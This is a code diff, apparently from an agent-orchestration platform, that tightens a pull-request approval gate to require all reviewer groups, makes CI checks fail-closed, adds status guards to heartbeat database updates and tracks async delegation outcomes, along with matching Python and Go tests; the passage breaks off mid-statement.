|
||||
},
|
||||
),
|
||||
@@ -450,7 +450,7 @@ def test_required_workflow_with_paths_ignore_fails(
|
||||
rc = lint_module.run()
|
||||
assert rc == 1
|
||||
out = capsys.readouterr().out
|
||||
assert "sop-tier-check.yml" in out
|
||||
assert "sop-checklist.yml" in out
|
||||
assert "paths-ignore" in out
|
||||
|
||||
|
||||
|
||||
@@ -78,7 +78,7 @@ def wd_module():
|
||||
"GITEA_HOST": "git.example.test",
|
||||
"REPO": "owner/repo",
|
||||
"WATCH_BRANCH": "main",
|
||||
"RED_LABEL": "tier:high",
|
||||
"RED_LABEL": "ci-bp-drift",
|
||||
}
|
||||
with mock.patch.dict(os.environ, env, clear=False):
|
||||
spec = importlib.util.spec_from_file_location(
|
||||
@@ -463,7 +463,7 @@ def test_red_detected_opens_issue(wd_module, monkeypatch):
|
||||
("GET", "/repos/owner/repo/issues"): (200, []), # no existing issue
|
||||
("POST", "/repos/owner/repo/issues"): (201, {"number": 555}),
|
||||
("GET", "/repos/owner/repo/labels"): (
|
||||
200, [{"id": 9, "name": "tier:high"}],
|
||||
200, [{"id": 9, "name": "ci-bp-drift"}],
|
||||
),
|
||||
("POST", "/repos/owner/repo/issues/555/labels"): (200, []),
|
||||
})
|
||||
@@ -1063,7 +1063,7 @@ def test_head_recheck_files_when_still_red_after_settling(
|
||||
if method == "GET" and path == "/repos/owner/repo/issues":
|
||||
return (200, [])
|
||||
if method == "GET" and path == "/repos/owner/repo/labels":
|
||||
return (200, [{"id": 9, "name": "tier:high"}])
|
||||
return (200, [{"id": 9, "name": "ci-bp-drift"}])
|
||||
if method == "POST" and path == "/repos/owner/repo/issues":
|
||||
post_filed["value"] = True
|
||||
return (201, {"number": 999})
|
||||
|
||||
@@ -35,7 +35,7 @@ GITEA_TOKEN = os.environ.get("GITEA_TOKEN", os.environ.get("GITHUB_TOKEN", ""))
|
||||
API_BASE = f"https://{GITEA_HOST}/api/v1"
|
||||
|
||||
# Timeout in seconds for all HTTP calls. Defence-in-depth: ensures a missing or
|
||||
# invalid SOP_TIER_CHECK_TOKEN causes a fast (~15 s) failure rather than an
|
||||
# invalid GITEA_TOKEN causes a fast (~15 s) failure rather than an
|
||||
# indefinite hang. The real fix is provisioning the token; this caps worst-case
|
||||
# wall-clock on a broken/unreachable Gitea host.
|
||||
DEFAULT_TIMEOUT = 15
|
||||
@@ -116,45 +116,27 @@ LOGIN_ALIASES = {
|
||||
"infra-sre": "core-devops",
|
||||
}
|
||||
|
||||
# SOP-6 tier → required agent groups
|
||||
# tier:low → engineers,managers,ceo (OR: any one suffices)
|
||||
# tier:medium → managers AND engineers AND qa,security (AND)
|
||||
# tier:high → ceo (OR, but single)
|
||||
# "?" = teams not yet created; treated as optional for MVP
|
||||
TIER_AGENTS = {
|
||||
"tier:low": {"managers": "core-lead", "engineers": "core-devops", "ceo": "ceo"},
|
||||
"tier:medium": {"managers": "core-lead", "engineers": "core-devops", "qa": "core-qa", "security": "core-security"},
|
||||
"tier:high": {"ceo": "ceo"},
|
||||
}
|
||||
|
||||
POSITIVE_VERDICTS = {"APPROVED", "N/A", "ACK"}
|
||||
|
||||
|
||||
def _get_pr_tier(pr_number: int, repo: str) -> str:
|
||||
"""Get the PR's tier label."""
|
||||
owner, name = repo.split("/", 1)
|
||||
try:
|
||||
pr = api_get(f"/repos/{owner}/{name}/pulls/{pr_number}")
|
||||
for label in pr.get("labels", []):
|
||||
name_l = label.get("name", "")
|
||||
if name_l in TIER_AGENTS:
|
||||
return name_l
|
||||
except GiteaError:
|
||||
pass
|
||||
return "tier:low" # Default for untagged PRs
|
||||
# Uniform required-agent set (SOP-6 tier removal, CTO 2026-06-07).
|
||||
# ALL of the following must APPROVE (AND gate, strict).
|
||||
REQUIRED_AGENTS = {
|
||||
"managers": "core-lead",
|
||||
"engineers": "core-devops",
|
||||
"qa": "core-qa",
|
||||
"security": "core-security",
|
||||
}
|
||||
|
||||
|
||||
def signal_1_comment_scan(pr_number: int, repo: str) -> dict:
|
||||
"""
|
||||
Scan issue + PR comments AND reviews for agent-tag policy gates.
|
||||
Matches tag AND author. Filters to tier-relevant agents.
|
||||
Matches tag AND author. All REQUIRED_AGENTS must positively ACK.
|
||||
Returns: {signal, results, verdict}
|
||||
"""
|
||||
owner, name = repo.split("/", 1)
|
||||
|
||||
# Get tier label to determine relevant agents
|
||||
tier = _get_pr_tier(pr_number, repo)
|
||||
relevant_roles = TIER_AGENTS.get(tier, TIER_AGENTS["tier:low"])
|
||||
relevant_roles = REQUIRED_AGENTS
|
||||
|
||||
# Build reverse map: login -> (group, agent_key)
|
||||
login_to_group = {}
|
||||
@@ -221,35 +203,22 @@ def signal_1_comment_scan(pr_number: int, repo: str) -> dict:
|
||||
latest = max(matches, key=lambda x: x["created_at"], default=None) if matches else None
|
||||
findings[agent_key] = {
|
||||
"group": group,
|
||||
"tier": tier,
|
||||
"found": latest,
|
||||
"verdict": latest["verdict"] if latest else "MISSING",
|
||||
}
|
||||
|
||||
# Compute gate verdict using tier-specific logic:
|
||||
# - tier:low / tier:high (OR gate): ANY positive = CLEAR, ANY negative = BLOCKED
|
||||
# - tier:medium (AND gate): ALL must be positive = CLEAR, ANY negative = BLOCKED
|
||||
# Uniform AND gate: ALL required agents must be positive.
|
||||
verdicts = [f["verdict"] for f in findings.values()]
|
||||
if not verdicts:
|
||||
gate_verdict = "N/A"
|
||||
elif tier in ("tier:low", "tier:high"):
|
||||
# OR gate: one positive is enough
|
||||
if any(v in POSITIVE_VERDICTS for v in verdicts):
|
||||
gate_verdict = "CLEAR"
|
||||
elif any(v in ("BLOCKED", "CHANGES_REQUESTED", "COMMENT") for v in verdicts):
|
||||
gate_verdict = "BLOCKED"
|
||||
else:
|
||||
gate_verdict = "INCOMPLETE"
|
||||
elif all(v in POSITIVE_VERDICTS for v in verdicts):
|
||||
gate_verdict = "CLEAR"
|
||||
elif any(v in ("BLOCKED", "CHANGES_REQUESTED", "COMMENT") for v in verdicts):
|
||||
gate_verdict = "BLOCKED"
|
||||
else:
|
||||
# AND gate (tier:medium): all must be positive
|
||||
if all(v in POSITIVE_VERDICTS for v in verdicts):
|
||||
gate_verdict = "CLEAR"
|
||||
elif any(v in ("BLOCKED", "CHANGES_REQUESTED", "COMMENT") for v in verdicts):
|
||||
gate_verdict = "BLOCKED"
|
||||
else:
|
||||
gate_verdict = "INCOMPLETE"
|
||||
gate_verdict = "INCOMPLETE"
|
||||
|
||||
return {"signal": "agent_tag_comments", "results": findings, "verdict": gate_verdict, "tier": tier}
|
||||
return {"signal": "agent_tag_comments", "results": findings, "verdict": gate_verdict}
|
||||
|
||||
|
||||
# ── Signal 2: REQUEST_CHANGES reviews state machine ────────────────────────────
|
||||
@@ -504,6 +473,7 @@ def signal_6_ci(pr_number: int, repo: str, branch: str | None = None, pr_data: d
|
||||
|
||||
failing_required = []
|
||||
passing_required = []
|
||||
pending_required = []
|
||||
for ctx in required_checks:
|
||||
state = check_statuses.get(ctx, "null")
|
||||
if state == "failure":
|
||||
@@ -511,7 +481,7 @@ def signal_6_ci(pr_number: int, repo: str, branch: str | None = None, pr_data: d
|
||||
elif state in ("success", "neutral"):
|
||||
passing_required.append(ctx)
|
||||
else:
|
||||
passing_required.append(f"{ctx} (pending)")
|
||||
pending_required.append(ctx)
|
||||
|
||||
# NOTE: do NOT use ci_state (combined_state) as a fallback verdict driver.
|
||||
# The combined_state is computed over ALL statuses including this
|
||||
@@ -519,12 +489,14 @@ def signal_6_ci(pr_number: int, repo: str, branch: str | None = None, pr_data: d
|
||||
# self-referential loop: gate-check posts failure → combined_state
|
||||
# becomes failure → script re-blocks → posts failure again.
|
||||
# The check_statuses dict already excludes gate-check (Bug-1 fix from
|
||||
# PR #547). Use failing_required as the sole CI gate; if no required
|
||||
# checks are defined on the branch, return CLEAR rather than re-using
|
||||
# the combined_state which includes our own status.
|
||||
# PR #547).
|
||||
#
|
||||
# Fail-closed: any required check that is missing, pending, or failing
|
||||
# blocks the gate. Only return CLEAR when every required check is
|
||||
# explicitly success/neutral.
|
||||
if failing_required:
|
||||
verdict = "CI_FAIL"
|
||||
elif ci_state == "pending":
|
||||
elif pending_required:
|
||||
verdict = "CI_PENDING"
|
||||
else:
|
||||
verdict = "CLEAR"
|
||||
@@ -535,6 +507,7 @@ def signal_6_ci(pr_number: int, repo: str, branch: str | None = None, pr_data: d
|
||||
"required_checks": required_checks,
|
||||
"failing_required": failing_required,
|
||||
"passing_required": passing_required,
|
||||
"pending_required": pending_required,
|
||||
"all_check_statuses": check_statuses,
|
||||
"verdict": verdict,
|
||||
}
|
||||
|
||||
@@ -39,11 +39,11 @@ def test_signal_1_infra_sre_login_alias_resolved_to_core_devops(monkeypatch):
|
||||
mod = load_gate_check()
|
||||
|
||||
def fake_api_get(path):
|
||||
# PR 900 has tier:low label
|
||||
# PR 900 has area:ci label
|
||||
if path == "/repos/molecule-ai/molecule-core/pulls/900":
|
||||
return {
|
||||
"number": 900,
|
||||
"labels": [{"name": "tier:low"}],
|
||||
"labels": [{"name": "area:ci"}],
|
||||
}
|
||||
raise AssertionError(f"unexpected api_get: {path}")
|
||||
|
||||
@@ -59,7 +59,25 @@ def test_signal_1_infra_sre_login_alias_resolved_to_core_devops(monkeypatch):
|
||||
"user": {"login": "infra-sre"},
|
||||
"state": "APPROVED",
|
||||
"submitted_at": "2026-05-13T10:00:00Z",
|
||||
}
|
||||
},
|
||||
{
|
||||
"id": 2,
|
||||
"user": {"login": "core-lead"},
|
||||
"state": "APPROVED",
|
||||
"submitted_at": "2026-05-13T10:00:01Z",
|
||||
},
|
||||
{
|
||||
"id": 3,
|
||||
"user": {"login": "core-qa"},
|
||||
"state": "APPROVED",
|
||||
"submitted_at": "2026-05-13T10:00:02Z",
|
||||
},
|
||||
{
|
||||
"id": 4,
|
||||
"user": {"login": "core-security"},
|
||||
"state": "APPROVED",
|
||||
"submitted_at": "2026-05-13T10:00:03Z",
|
||||
},
|
||||
]
|
||||
raise AssertionError(f"unexpected api_list: {path}")
|
||||
|
||||
@@ -85,7 +103,7 @@ def test_signal_1_null_user_in_review_does_not_crash(monkeypatch):
|
||||
if path == "/repos/molecule-ai/molecule-core/pulls/901":
|
||||
return {
|
||||
"number": 901,
|
||||
"labels": [{"name": "tier:low"}],
|
||||
"labels": [{"name": "area:ci"}],
|
||||
}
|
||||
raise AssertionError(f"unexpected api_get: {path}")
|
||||
|
||||
@@ -108,6 +126,24 @@ def test_signal_1_null_user_in_review_does_not_crash(monkeypatch):
|
||||
"state": "APPROVED",
|
||||
"submitted_at": "2026-05-13T10:01:00Z",
|
||||
},
|
||||
{
|
||||
"id": 3,
|
||||
"user": {"login": "core-lead"},
|
||||
"state": "APPROVED",
|
||||
"submitted_at": "2026-05-13T10:01:01Z",
|
||||
},
|
||||
{
|
||||
"id": 4,
|
||||
"user": {"login": "core-qa"},
|
||||
"state": "APPROVED",
|
||||
"submitted_at": "2026-05-13T10:01:02Z",
|
||||
},
|
||||
{
|
||||
"id": 5,
|
||||
"user": {"login": "core-security"},
|
||||
"state": "APPROVED",
|
||||
"submitted_at": "2026-05-13T10:01:03Z",
|
||||
},
|
||||
]
|
||||
raise AssertionError(f"unexpected api_list: {path}")
|
||||
|
||||
@@ -116,7 +152,7 @@ def test_signal_1_null_user_in_review_does_not_crash(monkeypatch):
|
||||
|
||||
result = mod.signal_1_comment_scan(901, "molecule-ai/molecule-core")
|
||||
|
||||
# Should not crash; the valid review from core-devops still satisfies engineers gate
|
||||
# Should not crash; all required gates clear
|
||||
assert result["verdict"] == "CLEAR"
|
||||
assert result["results"]["core-devops"]["verdict"] == "APPROVED"
|
||||
|
||||
|
||||
@@ -450,6 +450,98 @@ func TestHeartbeat_DegradedRecovery(t *testing.T) {
|
||||
}
|
||||
}
|
||||
|
||||
// TestHeartbeat_ErrorRateDegrade_Guarded verifies the error_rate degrade path
|
||||
// carries the `AND status = 'online'` guard, preventing a racing heartbeat
|
||||
// from flipping a concurrently-removed workspace back to degraded.
|
||||
func TestHeartbeat_ErrorRateDegrade_Guarded(t *testing.T) {
|
||||
mock := setupTestDB(t)
|
||||
setupTestRedis(t)
|
||||
broadcaster := newTestBroadcaster()
|
||||
handler := NewRegistryHandler(broadcaster)
|
||||
|
||||
mock.ExpectQuery("SELECT COALESCE\\(current_task").
|
||||
WithArgs("ws-degrade-guard").
|
||||
WillReturnRows(sqlmock.NewRows([]string{"current_task"}).AddRow(""))
|
||||
mock.ExpectExec("UPDATE workspaces SET").
|
||||
WithArgs("ws-degrade-guard", 0.6, "", 1, 100, "").
|
||||
WillReturnResult(sqlmock.NewResult(0, 1))
|
||||
|
||||
// Stale read: heartbeat started before CascadeDelete set status='removed'
|
||||
mock.ExpectQuery("SELECT status FROM workspaces WHERE id =").
|
||||
WithArgs("ws-degrade-guard").
|
||||
WillReturnRows(sqlmock.NewRows([]string{"status"}).AddRow("online"))
|
||||
|
||||
// Guarded UPDATE returns 0 rows because row is actually 'removed'
|
||||
mock.ExpectExec("UPDATE workspaces SET status =.*AND status = 'online'").
|
||||
WithArgs(models.StatusDegraded, "ws-degrade-guard").
|
||||
WillReturnResult(sqlmock.NewResult(0, 0))
|
||||
|
||||
// Broadcast still fires (existing behaviour) — mock it so sqlmock passes
|
||||
mock.ExpectExec("INSERT INTO structure_events").
|
||||
WillReturnResult(sqlmock.NewResult(0, 1))
|
||||
|
||||
w := httptest.NewRecorder()
|
||||
c, _ := gin.CreateTestContext(w)
|
||||
body := `{"workspace_id":"ws-degrade-guard","error_rate":0.6,"sample_error":"","active_tasks":1,"uptime_seconds":100}`
|
||||
c.Request = httptest.NewRequest("POST", "/registry/heartbeat", bytes.NewBufferString(body))
|
||||
c.Request.Header.Set("Content-Type", "application/json")
|
||||
|
||||
handler.Heartbeat(c)
|
||||
|
||||
if w.Code != http.StatusOK {
|
||||
t.Errorf("expected 200, got %d: %s", w.Code, w.Body.String())
|
||||
}
|
||||
if err := mock.ExpectationsWereMet(); err != nil {
|
||||
t.Errorf("unmet expectations: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
// TestHeartbeat_DegradedRecovery_Guarded verifies the degraded→online recovery
|
||||
// path carries the `AND status = 'degraded'` guard, preventing a racing
|
||||
// heartbeat from flipping a concurrently-removed workspace back to online.
|
||||
func TestHeartbeat_DegradedRecovery_Guarded(t *testing.T) {
|
||||
mock := setupTestDB(t)
|
||||
setupTestRedis(t)
|
||||
broadcaster := newTestBroadcaster()
|
||||
handler := NewRegistryHandler(broadcaster)
|
||||
|
||||
mock.ExpectQuery("SELECT COALESCE\\(current_task").
|
||||
WithArgs("ws-recover-guard").
|
||||
WillReturnRows(sqlmock.NewRows([]string{"current_task"}).AddRow(""))
|
||||
mock.ExpectExec("UPDATE workspaces SET").
|
||||
WithArgs("ws-recover-guard", 0.05, "", 1, 100, "").
|
||||
WillReturnResult(sqlmock.NewResult(0, 1))
|
||||
|
||||
// Stale read: heartbeat started before CascadeDelete set status='removed'
|
||||
mock.ExpectQuery("SELECT status FROM workspaces WHERE id =").
|
||||
WithArgs("ws-recover-guard").
|
||||
WillReturnRows(sqlmock.NewRows([]string{"status"}).AddRow("degraded"))
|
||||
|
||||
// Guarded UPDATE returns 0 rows because row is actually 'removed'
|
||||
mock.ExpectExec("UPDATE workspaces SET status =.*AND status = 'degraded'").
|
||||
WithArgs(models.StatusOnline, "ws-recover-guard").
|
||||
WillReturnResult(sqlmock.NewResult(0, 0))
|
||||
|
||||
// Broadcast still fires (existing behaviour) — mock it so sqlmock passes
|
||||
mock.ExpectExec("INSERT INTO structure_events").
|
||||
WillReturnResult(sqlmock.NewResult(0, 1))
|
||||
|
||||
w := httptest.NewRecorder()
|
||||
c, _ := gin.CreateTestContext(w)
|
||||
body := `{"workspace_id":"ws-recover-guard","error_rate":0.05,"sample_error":"","active_tasks":1,"uptime_seconds":100}`
|
||||
c.Request = httptest.NewRequest("POST", "/registry/heartbeat", bytes.NewBufferString(body))
|
||||
c.Request.Header.Set("Content-Type", "application/json")
|
||||
|
||||
handler.Heartbeat(c)
|
||||
|
||||
if w.Code != http.StatusOK {
|
||||
t.Errorf("expected 200, got %d: %s", w.Code, w.Body.String())
|
||||
}
|
||||
if err := mock.ExpectationsWereMet(); err != nil {
|
||||
t.Errorf("unmet expectations: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
// ---------- a2a_proxy.go: Workspace has no URL (503 with status) ----------
|
||||
|
||||
func TestProxyA2A_WorkspaceNoURL(t *testing.T) {
|
||||
|
||||
@@ -63,7 +63,11 @@ var (
|
||||
providerRegistryErr error
|
||||
)
|
||||
|
||||
func providerRegistry() (*providers.Manifest, error) {
|
||||
// providerRegistry loads the embedded providers manifest once and caches it.
|
||||
// Defined as a variable (not a named function) so tests can swap in a mock
|
||||
// without restarting the process — required for fail-closed coverage of the
|
||||
// registry-unavailable path (workspace_provision_derive_test.go).
|
||||
var providerRegistry = func() (*providers.Manifest, error) {
|
||||
providerRegistryOnce.Do(func() {
|
||||
providerRegistryManifest, providerRegistryErr = providers.LoadManifest()
|
||||
if providerRegistryErr != nil {
|
||||
|
||||
@@ -291,7 +291,10 @@ func TestMCPHandler_DelegateTaskAsync_RoutesThroughPlatformA2AProxy(t *testing.T
|
||||
WithArgs(callerID, callerID, targetID, "Delegating to "+targetID, sqlmock.AnyArg(), "pending").
|
||||
WillReturnResult(sqlmock.NewResult(1, 1))
|
||||
mock.ExpectExec(`UPDATE activity_logs`).
|
||||
WithArgs("dispatched", "", callerID, sqlmock.AnyArg()).
|
||||
WithArgs("queued", "", callerID, sqlmock.AnyArg()).
|
||||
WillReturnResult(sqlmock.NewResult(0, 1))
|
||||
mock.ExpectExec(`UPDATE activity_logs`).
|
||||
WithArgs("delivered", "", callerID, sqlmock.AnyArg()).
|
||||
WillReturnResult(sqlmock.NewResult(0, 1))
|
||||
|
||||
called := make(chan struct{}, 1)
|
||||
@@ -311,7 +314,7 @@ func TestMCPHandler_DelegateTaskAsync_RoutesThroughPlatformA2AProxy(t *testing.T
|
||||
if err != nil {
|
||||
t.Fatalf("delegate_task_async returned error: %v", err)
|
||||
}
|
||||
if !strings.Contains(out, `"status":"dispatched"`) {
|
||||
if !strings.Contains(out, `"status":"queued"`) {
|
||||
t.Fatalf("delegate_task_async response = %s", out)
|
||||
}
|
||||
waitGlobalAsyncForTest()
|
||||
@@ -397,7 +400,10 @@ func TestMCPHandler_DelegateTaskAsync_WithAttachments(t *testing.T) {
|
||||
WithArgs(callerID, callerID, targetID, "Delegating to "+targetID, sqlmock.AnyArg(), "pending").
|
||||
WillReturnResult(sqlmock.NewResult(1, 1))
|
||||
mock.ExpectExec(`UPDATE activity_logs`).
|
||||
WithArgs("dispatched", "", callerID, sqlmock.AnyArg()).
|
||||
WithArgs("queued", "", callerID, sqlmock.AnyArg()).
|
||||
WillReturnResult(sqlmock.NewResult(0, 1))
|
||||
mock.ExpectExec(`UPDATE activity_logs`).
|
||||
WithArgs("delivered", "", callerID, sqlmock.AnyArg()).
|
||||
WillReturnResult(sqlmock.NewResult(0, 1))
|
||||
|
||||
called := make(chan []byte, 1)
|
||||
@@ -423,7 +429,7 @@ func TestMCPHandler_DelegateTaskAsync_WithAttachments(t *testing.T) {
|
||||
if err != nil {
|
||||
t.Fatalf("delegate_task_async returned error: %v", err)
|
||||
}
|
||||
if !strings.Contains(out, `"status":"dispatched"`) {
|
||||
if !strings.Contains(out, `"status":"queued"`) {
|
||||
t.Fatalf("delegate_task_async response = %s", out)
|
||||
}
|
||||
waitGlobalAsyncForTest()
|
||||
@@ -455,7 +461,10 @@ func TestMCPHandler_DelegateTaskAsync_MarshalFailureDoesNotCallProxy(t *testing.
|
||||
WithArgs(callerID, callerID, targetID, "Delegating to "+targetID, sqlmock.AnyArg(), "pending").
|
||||
WillReturnResult(sqlmock.NewResult(1, 1))
|
||||
mock.ExpectExec(`UPDATE activity_logs`).
|
||||
WithArgs("dispatched", "", callerID, sqlmock.AnyArg()).
|
||||
WithArgs("queued", "", callerID, sqlmock.AnyArg()).
|
||||
WillReturnResult(sqlmock.NewResult(0, 1))
|
||||
mock.ExpectExec(`UPDATE activity_logs`).
|
||||
WithArgs("failed", sqlmock.AnyArg(), callerID, sqlmock.AnyArg()).
|
||||
WillReturnResult(sqlmock.NewResult(0, 1))
|
||||
|
||||
// Force the (otherwise near-impossible) marshal failure for the A2A body.
|
||||
@@ -478,7 +487,7 @@ func TestMCPHandler_DelegateTaskAsync_MarshalFailureDoesNotCallProxy(t *testing.
|
||||
if err != nil {
|
||||
t.Fatalf("delegate_task_async returned error: %v", err)
|
||||
}
|
||||
if !strings.Contains(out, `"status":"dispatched"`) {
|
||||
if !strings.Contains(out, `"status":"queued"`) {
|
||||
t.Fatalf("delegate_task_async response = %s", out)
|
||||
}
|
||||
|
||||
|
||||
@@ -286,12 +286,12 @@ func (h *MCPHandler) toolDelegateTaskAsync(ctx context.Context, callerID string,
|
||||
delegationID := uuid.New().String()
|
||||
|
||||
// Issue #158: write delegation row so canvas Agent Comms tab shows the task text.
|
||||
// Insert with 'dispatched' status since the goroutine won't update it.
|
||||
// Insert with 'queued' status; goroutine updates to delivered or failed.
|
||||
if err := insertMCPDelegationRow(ctx, h.database, callerID, targetID, delegationID, task); err != nil {
|
||||
log.Printf("MCP delegate_task_async: failed to record delegation row: %v", err)
|
||||
// Non-fatal: still fire the A2A call.
|
||||
} else {
|
||||
updateMCPDelegationStatus(ctx, h.database, callerID, delegationID, "dispatched", "")
|
||||
updateMCPDelegationStatus(ctx, h.database, callerID, delegationID, "queued", "")
|
||||
}
|
||||
|
||||
// Fire and forget in a detached goroutine. Use a background context so
|
||||
@@ -321,21 +321,28 @@ func (h *MCPHandler) toolDelegateTaskAsync(ctx context.Context, callerID string,
|
||||
log.Printf("toolDelegateTask %s: json.Marshal a2aBody failed: %v", delegationID, marshalErr)
|
||||
// Bail out: proceeding would call proxyA2ARequest with a
|
||||
// nil/empty body, dispatching a malformed A2A request.
|
||||
updateMCPDelegationStatus(bgCtx, h.database, callerID, delegationID, "failed", fmt.Sprintf("marshal_error: %v", marshalErr))
|
||||
return
|
||||
}
|
||||
|
||||
status, _, err := h.proxyA2ARequest(bgCtx, targetID, a2aBody, callerID, true)
|
||||
if err != nil || status < 200 || status >= 300 {
|
||||
var errorDetail string
|
||||
if err != nil {
|
||||
log.Printf("MCPHandler.delegate_task_async: A2A proxy to %s: %v", targetID, err)
|
||||
errorDetail = fmt.Sprintf("target_offline: %v", err)
|
||||
} else {
|
||||
log.Printf("MCPHandler.delegate_task_async: A2A proxy to %s returned status %d", targetID, status)
|
||||
errorDetail = fmt.Sprintf("http_status: %d", status)
|
||||
}
|
||||
updateMCPDelegationStatus(bgCtx, h.database, callerID, delegationID, "failed", errorDetail)
|
||||
return
|
||||
}
|
||||
|
||||
updateMCPDelegationStatus(bgCtx, h.database, callerID, delegationID, "delivered", "")
|
||||
})
|
||||
|
||||
return fmt.Sprintf(`{"task_id":%q,"status":"dispatched","target_id":%q}`, delegationID, targetID), nil
|
||||
return fmt.Sprintf(`{"task_id":%q,"status":"queued","target_id":%q}`, delegationID, targetID), nil
|
||||
}
|
||||
|
||||
func (h *MCPHandler) toolCheckTaskStatus(ctx context.Context, callerID string, args map[string]interface{}) (string, error) {
|
||||
|
||||
@@ -226,17 +226,27 @@ func (h *MemoriesHandler) Commit(c *gin.Context) {
|
||||
Source: contract.MemorySourceUser,
|
||||
})
|
||||
if err != nil {
|
||||
log.Printf("Commit memory plugin error: workspace=%s scope=%s namespace=%s err_class=%T err=%q", workspaceID, body.Scope, nsName, err, err)
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to store memory"})
|
||||
return
|
||||
}
|
||||
memoryID := resp.ID
|
||||
// Server-side log ONLY. The client response below is the generic
|
||||
// 500 — the underlying plugin error must NOT leak to the HTTP
|
||||
// response body (clients have no business seeing the memory
|
||||
// plugin's internal error class, message, or stack; the same
|
||||
// discipline as the #2392 leak fix). We include enough context
|
||||
// here for an operator to diagnose the failure from the server
|
||||
// log: workspace id, requested scope, the resolved v2 namespace,
|
||||
// the concrete Go error type (for log-aggregator filtering via
|
||||
// `err_class=...`), and the quoted error message (preserves
|
||||
// trailing whitespace / special chars that %v would munge).
|
||||
log.Printf(
|
||||
"Commit memory plugin error: workspace=%s scope=%s namespace=%s err_class=%T err=%q",
|
||||
workspaceID, body.Scope, nsName, err, err,
|
||||
)
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to store memory"})
|
||||
return
|
||||
}
|
||||
memoryID := resp.ID
|
||||
|
||||
// #767 Audit: write a GLOBAL memory audit log entry for forensic replay.
|
||||
// Records a SHA-256 hash of the content — never plaintext — so the audit
|
||||
// trail can prove what was written without leaking sensitive values.
|
||||
// Failure is non-fatal: a logging error must not roll back a successful write.
|
||||
if body.Scope == "GLOBAL" {
|
||||
// #767 Audit: write a GLOBAL memory audit log entry for forensic replay.
|
||||
// Records a SHA-256 hash of the content — never plaintext — so the audit
|
||||
// Hash the sanitised content so the audit trail reflects what was
|
||||
// actually persisted (not the raw, potentially secret-bearing input).
|
||||
sum := sha256.Sum256([]byte(content))
|
||||
|
||||
@@ -321,7 +321,17 @@ func (h *OrgHandler) createWorkspaceTree(ws OrgWorkspace, parentID *string, absX
|
||||
}
|
||||
|
||||
// Always generate default config.yaml (runtime, model, tier, etc.)
|
||||
configFiles := h.workspace.ensureDefaultConfig(id, payload)
|
||||
configFiles, cfgErr := h.workspace.ensureDefaultConfig(id, payload)
|
||||
if cfgErr != nil {
|
||||
log.Printf("Org import: default config generation failed for %s: %v — marking workspace failed", ws.Name, cfgErr)
|
||||
// Fail-closed: the workspace row + layout + broadcast are already
|
||||
// persisted above (status='provisioning'). If we fall through,
|
||||
// the workspace stays stuck in provisioning silently. Mark it
|
||||
// failed so the canvas surfaces the failure card and the operator
|
||||
// sees the signal immediately, then skip the provisioning block.
|
||||
h.workspace.markProvisionFailed(ctx, id, fmt.Sprintf("default config generation failed: %v", cfgErr), nil)
|
||||
goto skipProvision
|
||||
}
|
||||
|
||||
// Copy files_dir contents on top (system-prompt.md, CLAUDE.md, skills/, etc.)
|
||||
// Uses templatePath for CopyTemplateToContainer — runs AFTER configFiles are written
|
||||
@@ -548,6 +558,7 @@ func (h *OrgHandler) createWorkspaceTree(ws OrgWorkspace, parentID *string, absX
|
||||
})
|
||||
}
|
||||
|
||||
skipProvision:
|
||||
// internal#2006: migrate runtime-created schedules from a removed
|
||||
// predecessor of the same agent (role+parent) onto this freshly-created
|
||||
// workspace. Reconcile re-derives template-sourced state below, but
|
||||
|
||||
@@ -787,7 +787,8 @@ func (h *RegistryHandler) evaluateStatus(c *gin.Context, payload models.Heartbea
|
||||
nativeStatus := runtimeOverrides.HasCapability(payload.WorkspaceID, "status_mgmt")
|
||||
|
||||
if !nativeStatus && currentStatus == "online" && payload.ErrorRate >= 0.5 {
|
||||
if _, err := db.DB.ExecContext(ctx, `UPDATE workspaces SET status = $1, updated_at = now() WHERE id = $2`, models.StatusDegraded, payload.WorkspaceID); err != nil {
|
||||
// #73 guard: heartbeat degrade must not resurrect a removed workspace.
|
||||
if _, err := db.DB.ExecContext(ctx, `UPDATE workspaces SET status = $1, updated_at = now() WHERE id = $2 AND status = 'online'`, models.StatusDegraded, payload.WorkspaceID); err != nil {
|
||||
log.Printf("Heartbeat: failed to mark %s degraded: %v", payload.WorkspaceID, err)
|
||||
}
|
||||
h.broadcaster.RecordAndBroadcast(ctx, string(events.EventWorkspaceDegraded), payload.WorkspaceID, map[string]interface{}{
|
||||
@@ -806,7 +807,8 @@ func (h *RegistryHandler) evaluateStatus(c *gin.Context, payload models.Heartbea
|
||||
// Skipped under native_status_mgmt for the same reason as the
|
||||
// degrade branch above: the adapter owns the transition.
|
||||
if !nativeStatus && currentStatus == "degraded" && payload.ErrorRate < 0.1 && payload.RuntimeState == "" {
|
||||
if _, err := db.DB.ExecContext(ctx, `UPDATE workspaces SET status = $1, updated_at = now() WHERE id = $2`, models.StatusOnline, payload.WorkspaceID); err != nil {
|
||||
// #73 guard: heartbeat recovery must not resurrect a removed workspace.
|
||||
if _, err := db.DB.ExecContext(ctx, `UPDATE workspaces SET status = $1, updated_at = now() WHERE id = $2 AND status = 'degraded'`, models.StatusOnline, payload.WorkspaceID); err != nil {
|
||||
log.Printf("Heartbeat: failed to recover %s to online: %v", payload.WorkspaceID, err)
|
||||
}
|
||||
h.broadcaster.RecordAndBroadcast(ctx, string(events.EventWorkspaceOnline), payload.WorkspaceID, map[string]interface{}{})
|
||||
@@ -867,6 +869,29 @@ func (h *RegistryHandler) evaluateStatus(c *gin.Context, payload models.Heartbea
|
||||
})
|
||||
}
|
||||
|
||||
// Auto-recovery from failed: the provision-timeout sweeper
|
||||
// (registry/provisiontimeout.go) flips a workspace to 'failed' when it sits
|
||||
// in 'provisioning' past DefaultProvisioningTimeout (10m for claude-code).
|
||||
// But a slow cold-boot (EC2 image pull + LLM preflight) can still finish and
|
||||
// start heartbeating AFTER the flip — agent_card is written unconditionally
|
||||
// on register, so the box is genuinely serving while its status is stuck
|
||||
// 'failed'. A live heartbeat is authoritative: recover to online. Without
|
||||
// this, a healthy-but-slow workspace (e.g. a model that preflights slower
|
||||
// than the 10m budget) shows 'failed' forever despite working — the
|
||||
// mechanism behind the intermittent multi-provider e2e "boot failures". The
|
||||
// `AND status = 'failed'` guard keeps the flip conditional (won't override
|
||||
// 'removed').
|
||||
if currentStatus == "failed" {
|
||||
